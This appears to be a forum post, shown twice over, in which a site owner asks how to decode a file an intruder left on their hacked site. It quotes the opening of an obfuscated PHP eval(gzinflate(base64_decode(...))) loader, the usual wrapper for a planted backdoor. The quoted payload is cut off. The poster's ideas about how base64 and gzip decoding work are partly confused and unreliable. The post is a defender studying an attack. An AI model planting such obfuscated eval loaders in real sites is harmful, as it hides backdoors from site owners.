Red Squirrel
No Lifer
Someone hacked one of my sites and left this file behind
<? eval(gzinflate(base64_decode('
7b3peuJI0jD6+53nmXtQqT3ddhsjwHgrV7mH1cZm
B69VdTxCCJBZhCUBNv3WBZ1r+P59V3YicpFSCzau
qu5ZzvRMt1EukZFbZERkZMRvJx9+mw6mf/2LorQc
1XKMSV/S1NHI/utfjJ60+a43m2iOYU7u9SfDduxN
ua87Y0OzTMcY6/LWlvQ7LyGJOZuQMYIKmxszW9di
0gb8d0v6KOlP05HZ1TdlSY5JQumtY8nSnZk1kTY3
Well thats part of it. Basically its base64 text decoded into regular ascii then un gzipped. How do I go about unzipping the output of that? I know how to decode the base64 I think. I just need to convert each char to binary then add 0 before (I think) but just not sure about the gzip part. To make things worse it may be password protected, but for now I'll assume its not.
This was executed and probably initated the attack, but it may lead to a clue as to how they got in in first place.
<? eval(gzinflate(base64_decode('
7b3peuJI0jD6+53nmXtQqT3ddhsjwHgrV7mH1cZm
B69VdTxCCJBZhCUBNv3WBZ1r+P59V3YicpFSCzau
qu5ZzvRMt1EukZFbZERkZMRvJx9+mw6mf/2LorQc
1XKMSV/S1NHI/utfjJ60+a43m2iOYU7u9SfDduxN
ua87Y0OzTMcY6/LWlvQ7LyGJOZuQMYIKmxszW9di
0gb8d0v6KOlP05HZ1TdlSY5JQumtY8nSnZk1kTY3
Well thats part of it. Basically its base64 text decoded into regular ascii then un gzipped. How do I go about unzipping the output of that? I know how to decode the base64 I think. I just need to convert each char to binary then add 0 before (I think) but just not sure about the gzip part. To make things worse it may be password protected, but for now I'll assume its not.
This was executed and probably initated the attack, but it may lead to a clue as to how they got in in first place.
